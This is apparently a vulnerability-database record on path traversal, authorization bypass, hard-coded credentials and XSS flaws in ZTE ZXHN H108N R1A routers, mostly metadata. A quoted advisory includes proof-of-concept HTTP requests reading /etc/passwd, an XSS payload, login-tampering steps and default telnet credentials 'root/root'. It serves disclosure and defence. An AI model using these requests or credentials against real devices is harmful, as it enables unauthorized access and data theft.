Details of VAR-201512-0230

ID

VAR-201512-0230

CVE

CVE-2015-7250

TITLE

ZTE ZXHN H108N R1A routers contain multiple vulnerabilities

Trust: 0.8

sources: CERT/CC: VU#391604

DESCRIPTION

Absolute path traversal vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities: 1. Multiple information-disclosure vulnerabilities 2. An authorization-bypass vulnerability 3. A directory-traversal vulnerability 4. A hard-coded credentials vulnerability 5. A cross-site scripting vulnerability Attackers can exploit these issues to gain access to the browser of an unsuspecting user and execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. *CVE-ID*: CVE-2015-7248 CVE-2015-7249 CVE-2015-7250 CVE-2015-7251 CVE-2015-7252 *Note*: Large deployment size, primarily in Peru, used by TdP. Description *CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information Exposure* - CVE-2015-7248 Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A. A. User names and password hashes can be viewed in the page source of http://<IP>/cgi-bin/webproc PoC: Login Page source contents: ...snip.... //get user info var G_UserInfo = new Array(); var m = 0; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "admin"; //UserName G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here G_UserInfo[m][2] = "1"; //Level G_UserInfo[m][3] = "1"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "user"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "2"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "support"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "3"; //Index m++; ...snip... B. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE. *CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper Authorization* - CVE-2015-7249 By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such as user or support, and may be able to perform actions otherwise not allowed. PoC 1: 1. Login page user drop-down option shows only admin only. 2. Use an intercepting proxy / Tamper Data - and intercept the Login submit request. 3. Change the username admin to user / support and continue Login. 4. Application permits other users to log in to mgmt portal. PoC 2: After logging in as support, some functional options are visibly restricted. Certain actions can still be performed by calling the url directly. Application does not perform proper AuthZ checks. Following poc is a change password link. It is accessible directly, though it (correctly) is restricted to changing normal user (non-admin) password only. http:// <IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd Other functions / pages may also be accessible to non-privileged users. Arbitrary files can be read off of the device. No authentication is required to exploit this vulnerability. PoC HTTP POST request POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177 getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a HTTP Response HTTP/1.0 200 OK Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=7ce7bd4a; expires=Fri, 31Dec9999 23:59:59 GMT;path=/ #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh *CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of Hard-coded Credentials* - CVE-2015-7251 In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password. *CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') *- CVE-2015-7252 In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting [pre-authentication]. PoC POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177 getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a +++++ -- Best Regards, Karn Ganeshen

Trust: 3.42

sources: NVD: CVE-2015-7250 // CERT/CC: VU#391604 // JVNDB: JVNDB-2015-006589 // CNVD: CNVD-2015-07625 // BID: 77421 // VULHUB: VHN-85211 // VULMON: CVE-2015-7250 // PACKETSTORM: 134492

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2015-07625

AFFECTED PRODUCTS

vendor:	zte	model:	zxhn h108n r1a	scope:	lte	version:	zte.bhs.zxhnh108nr1a.h_pe	Trust: 1.0
vendor:	zte	model:	-	scope:	-	version:	-	Trust: 0.8
vendor:	zte	model:	zxhn h108n r1a	scope:	-	version:	-	Trust: 0.8
vendor:	zte	model:	zxhn h108n r1a	scope:	lt	version:	zte.bhs.zxhnh108nr1a.k_pe	Trust: 0.8
vendor:	zte	model:	zxhn h108n r1a zte.bhs.zxhnh108nr1a.h pe	scope:	-	version:	-	Trust: 0.6
vendor:	zte	model:	zxhn h108n r1a	scope:	eq	version:	zte.bhs.zxhnh108nr1a.h_pe	Trust: 0.6
vendor:	zte	model:	zxv10 w300 w300v1.0.0f er1 pe	scope:	-	version:	-	Trust: 0.3
vendor:	zte	model:	zxhn h108n r1a zte.bhs.zxhnh108nr1a	scope:	-	version:	-	Trust: 0.3
vendor:	zte	model:	zxhn h108n r1a zte.bhs.zxhnh108nr1a	scope:	ne	version:	-	Trust: 0.3

sources: CERT/CC: VU#391604 // CNVD: CNVD-2015-07625 // BID: 77421 // JVNDB: JVNDB-2015-006589 // CNNVD: CNNVD-201511-238 // NVD: CVE-2015-7250

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2015-7250
value:	HIGH
Trust: 1.0
NVD:	CVE-2015-7250
value:	HIGH
Trust: 0.8
CNVD:	CNVD-2015-07625
value:	HIGH
Trust: 0.6
CNNVD:	CNNVD-201511-238
value:	HIGH
Trust: 0.6
VULHUB:	VHN-85211
value:	HIGH
Trust: 0.1
VULMON:	CVE-2015-7250
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2015-7250
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2015-07625
severity:	HIGH
baseScore:	8.3
vectorString:	AV:A/AC:L/AU:N/C:C/I:C/A:C
accessVector:	ADJACENT_NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	6.5
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-85211
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2015-7250
baseSeverity:	HIGH
baseScore:	7.5
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	3.9
impactScore:	3.6
version:	3.0
Trust: 1.0

sources: CNVD: CNVD-2015-07625 // VULHUB: VHN-85211 // VULMON: CVE-2015-7250 // JVNDB: JVNDB-2015-006589 // CNNVD: CNNVD-201511-238 // NVD: CVE-2015-7250

PROBLEMTYPE DATA

problemtype:

CWE-22

Trust: 1.9

sources: VULHUB: VHN-85211 // JVNDB: JVNDB-2015-006589 // NVD: CVE-2015-7250

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201511-238

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201511-238

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-006589

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-85211 // VULMON: CVE-2015-7250

PATCH

title:	Top Page	url:	http://www.zte.co.jp/	Trust: 0.8
title:	ZTE ZXHN H108N R1A patch for arbitrary file read vulnerability	url:	https://www.cnvd.org.cn/patchInfo/show/66794	Trust: 0.6

sources: CNVD: CNVD-2015-07625 // JVNDB: JVNDB-2015-006589

EXTERNAL IDS

db:	CERT/CC	id:	VU#391604	Trust: 4.3
db:	NVD	id:	CVE-2015-7250	Trust: 3.6
db:	BID	id:	77421	Trust: 1.5
db:	EXPLOIT-DB	id:	38773	Trust: 1.2
db:	JVN	id:	JVNVU91514956	Trust: 0.8
db:	JVNDB	id:	JVNDB-2015-006589	Trust: 0.8
db:	CNVD	id:	CNVD-2015-07625	Trust: 0.6
db:	CNNVD	id:	CNNVD-201511-238	Trust: 0.6
db:	PACKETSTORM	id:	134492	Trust: 0.2
db:	SEEBUG	id:	SSVID-89797	Trust: 0.1
db:	VULHUB	id:	VHN-85211	Trust: 0.1
db:	VULMON	id:	CVE-2015-7250	Trust: 0.1

sources: CERT/CC: VU#391604 // CNVD: CNVD-2015-07625 // VULHUB: VHN-85211 // VULMON: CVE-2015-7250 // BID: 77421 // JVNDB: JVNDB-2015-006589 // PACKETSTORM: 134492 // CNNVD: CNNVD-201511-238 // NVD: CVE-2015-7250

REFERENCES

url:	https://www.kb.cert.org/vuls/id/391604	Trust: 3.6
url:	https://www.kb.cert.org/vuls/id/bluu-9zdjwa	Trust: 2.6
url:	https://www.exploit-db.com/exploits/38773/	Trust: 1.3
url:	http://www.securityfocus.com/bid/77421	Trust: 1.2
url:	http://cwe.mitre.org/data/definitions/22.html	Trust: 0.9
url:	https://cwe.mitre.org/data/definitions/200.html	Trust: 0.8
url:	https://cwe.mitre.org/data/definitions/285.html	Trust: 0.8
url:	https://cwe.mitre.org/data/definitions/288.html	Trust: 0.8
url:	http://cwe.mitre.org/data/definitions/798.html	Trust: 0.8
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7250	Trust: 0.8
url:	http://jvn.jp/vu/jvnvu91514956/index.html	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7250	Trust: 0.8
url:	http://www.zte.com.cn/	Trust: 0.3
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://packetstormsecurity.com/files/134492/zte-zxhn-h108n-r1a-zxv10-w300-traversal-disclosure-authorization.html	Trust: 0.1
url:	https://cwe.mitre.org/data/definitions/200.html>*:	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7250	Trust: 0.1
url:	http://cwe.mitre.org/data/definitions/22.html>*:	Trust: 0.1
url:	http://cwe.mitre.org/data/definitions/798.html>*:	Trust: 0.1
url:	https://www.zte.com.cn]	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7249	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7252	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7248	Trust: 0.1
url:	http://<ip>/cgi-bin/webproc	Trust: 0.1
url:	https://cwe.mitre.org/data/definitions/285.html>*:	Trust: 0.1
url:	https://ip/cgibin/webproc	Trust: 0.1
url:	https://cwe.mitre.org/data/definitions/79.html>*:	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7251	Trust: 0.1

CREDITS

Karn Ganeshen

Trust: 0.4

sources: BID: 77421 // PACKETSTORM: 134492

SOURCES

db:	CERT/CC	id:	VU#391604
db:	CNVD	id:	CNVD-2015-07625
db:	VULHUB	id:	VHN-85211
db:	VULMON	id:	CVE-2015-7250
db:	BID	id:	77421
db:	JVNDB	id:	JVNDB-2015-006589
db:	PACKETSTORM	id:	134492
db:	CNNVD	id:	CNNVD-201511-238
db:	NVD	id:	CVE-2015-7250

LAST UPDATE DATE

2025-04-13T23:03:36.548000+00:00

SOURCES UPDATE DATE

db:	CERT/CC	id:	VU#391604	date:	2015-11-04T00:00:00
db:	CNVD	id:	CNVD-2015-07625	date:	2015-11-17T00:00:00
db:	VULHUB	id:	VHN-85211	date:	2017-09-13T00:00:00
db:	VULMON	id:	CVE-2015-7250	date:	2017-09-13T00:00:00
db:	BID	id:	77421	date:	2016-02-02T20:05:00
db:	JVNDB	id:	JVNDB-2015-006589	date:	2016-01-05T00:00:00
db:	CNNVD	id:	CNNVD-201511-238	date:	2015-12-31T00:00:00
db:	NVD	id:	CVE-2015-7250	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	CERT/CC	id:	VU#391604	date:	2015-11-03T00:00:00
db:	CNVD	id:	CNVD-2015-07625	date:	2015-11-17T00:00:00
db:	VULHUB	id:	VHN-85211	date:	2015-12-30T00:00:00
db:	VULMON	id:	CVE-2015-7250	date:	2015-12-30T00:00:00
db:	BID	id:	77421	date:	2015-11-04T00:00:00
db:	JVNDB	id:	JVNDB-2015-006589	date:	2016-01-05T00:00:00
db:	PACKETSTORM	id:	134492	date:	2015-11-20T22:24:32
db:	CNNVD	id:	CNNVD-201511-238	date:	2015-11-13T00:00:00
db:	NVD	id:	CVE-2015-7250	date:	2015-12-30T05:59:03.253